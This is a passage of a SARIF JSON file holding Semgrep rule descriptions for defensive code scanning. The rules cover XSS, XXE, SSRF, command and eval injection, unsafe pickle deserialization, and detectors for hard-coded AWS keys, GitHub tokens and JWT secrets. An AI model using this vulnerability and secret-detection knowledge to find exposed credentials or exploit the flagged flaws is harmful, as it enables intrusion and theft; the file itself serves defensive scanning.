SHA256"},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","id":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","name":"swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256","properties":{"precision":"very-high","tags":["CWE-916: Use of Password Hash With Insufficient Computational Effort","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insufficient-pbkdf2-work-factor-sha256.insufficient-pbkdf2-work-factor-sha256"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"help":{"markdown":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html)\n - [https://www.npmjs.com/package/react-markdown#security](https://www.npmjs.com/package/react-markdown#security)\n","text":"Overwriting `transformLinkUri` or `transformImageUri` to something insecure, or turning `allowDangerousHtml` on, or turning `escapeHtml` off, will open the code up to XSS vectors."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","id":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","name":"typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-markdown-insecure-html.react-markdown-insecure-html"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Outlook Team detected"},"help":{"markdown":"Outlook Team detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Outlook Team detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-outlook-team.detected-outlook-team","id":"generic.secrets.security.detected-outlook-team.detected-outlook-team","name":"generic.secrets.security.detected-outlook-team.detected-outlook-team","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-outlook-team.detected-outlook-team"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"help":{"markdown":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled)\n - [https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/](https://www.projectatomic.io/blog/2016/03/dwalsh_selinux_containers/)\n - [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)\n","text":"Service '$SERVICE' is explicitly disabling SELinux separation. This runs the service as an unconfined type. Remove 'label:disable' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","id":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","name":"yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.selinux-separation-disabled.selinux-separation-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","id":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","name":"javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.headers.hardcoded-github-token.hardcoded-github-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"help":{"markdown":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string)\n - [https://bugs.python.org/issue43472](https://bugs.python.org/issue43472)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Found user controlled content in `run_string`. This is dangerous because it allows a malicious actor to run arbitrary Python code."},"helpUri":"https://semgrep.dev/r/python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","id":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","name":"python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.dangerous-subinterpreters-run-string.dangerous-subinterpreters-run-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"help":{"markdown":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval)\n - [https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen](https://docs.python.org/3/library/logging.config.html?highlight=security#logging.config.listen)\n","text":"Because portions of the logging configuration are passed through eval(), use of this function may open its users to a security risk. While the function only binds to a socket on localhost, and so does not accept connections from remote machines, there are scenarios where untrusted code could be run under the account of the process which calls listen(). To avoid this happening, use the `verify()` argument to `listen()` to prevent unrecognized configurations."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.logging.listeneval.listen-eval","id":"python.lang.security.audit.logging.listeneval.listen-eval","name":"python.lang.security.audit.logging.listeneval.listen-eval","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.logging.listeneval.listen-eval"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"help":{"markdown":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index)\n - [https://cwe.mitre.org/data/definitions/787.html](https://cwe.mitre.org/data/definitions/787.html)\n","text":"The preceding call to `$SOURCE` can return a negative value when an error is encountered. This can lead to an out-of-bounds array access and possible memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","id":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","name":"cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index","properties":{"precision":"very-high","tags":["CWE-787: Out-of-bounds Write","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.memory.negative-return-value-array-index.negative-return-value-array-index"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"help":{"markdown":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this DocumentBuilderFactory. This is vulnerable to XML external entity attacks. Disable this by setting the feature \"http://apache.org/xml/features/disallow-doctype-decl\" to true. Alternatively, allow DOCTYPE declarations and only prohibit external entities declarations. This can be done by setting the features \"http://xml.org/sax/features/external-general-entities\" and \"http://xml.org/sax/features/external-parameter-entities\" to false."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","id":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","name":"java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"help":{"markdown":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n - [https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n","text":"Detected use of xmlrpc. xmlrpc is not inherently safe from vulnerabilities. Use defusedxml.xmlrpc instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","id":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","name":"python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.use-defused-xmlrpc.use-defused-xmlrpc"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","id":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","name":"python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.jwt-hardcode.jwt-python-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"help":{"markdown":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n","text":"Avoid using `cPickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.pickle.avoid-cPickle","id":"python.lang.security.deserialization.pickle.avoid-cPickle","name":"python.lang.security.deserialization.pickle.avoid-cPickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.pickle.avoid-cPickle"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","id":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","name":"java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.tainted-ssrf-spring-format.tainted-ssrf-spring-format"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Do not use `math/rand`. Use `crypto/rand` instead."},"help":{"markdown":"Do not use `math/rand`. Use `crypto/rand` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#secure-random-number-generation)\n","text":"Do not use `math/rand`. Use `crypto/rand` instead."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.math_random.math-random-used","id":"go.lang.security.audit.crypto.math_random.math-random-used","name":"go.lang.security.audit.crypto.math_random.math-random-used","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.math_random.math-random-used"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"AWS Secret Access Key detected"},"help":{"markdown":"AWS Secret Access Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"AWS Secret Access Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","id":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","name":"generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-aws-secret-access-key.detected-aws-secret-access-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"help":{"markdown":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run)\n - [https://deno.land/manual/examples/subprocess#simple-example](https://deno.land/manual/examples/subprocess#simple-example)\n","text":"Detected non-literal calls to Deno.run(). This could lead to a command injection vulnerability."},"helpUri":"https://semgrep.dev/r/javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","id":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","name":"javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.deno.security.audit.deno-dangerous-run.deno-dangerous-run"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"help":{"markdown":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/app_service#http2_enabled)\n","text":"Use the latest version of HTTP to ensure you are benefiting from security fixes. Add `http2_enabled = true` to your appservice resource block"},"helpUri":"https://semgrep.dev/r/terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","id":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","name":"terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.appservice.appservice-enable-http2.appservice-enable-http2"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"help":{"markdown":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django)\n - [https://cwe.mitre.org/data/definitions/117.html](https://cwe.mitre.org/data/definitions/117.html)\n - [https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures](https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures)\n","text":"Detected a logger that logs user input without properly neutralizing the output. The log message could contain characters like ` ` and ` ` and cause an attacker to forge log entries or include malicious content into the logs. Use proper input validation and/or output encoding to prevent log entries from being forged."},"helpUri":"https://semgrep.dev/r/python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","id":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","name":"python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django","properties":{"precision":"very-high","tags":["CWE-117: Improper Output Neutralization for Logs","HIGH CONFIDENCE","OWASP-A09:2021 - Security Logging and Monitoring Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.log.tainted-log-injection-stdlib-django.tainted-log-injection-stdlib-django"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","id":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","name":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it 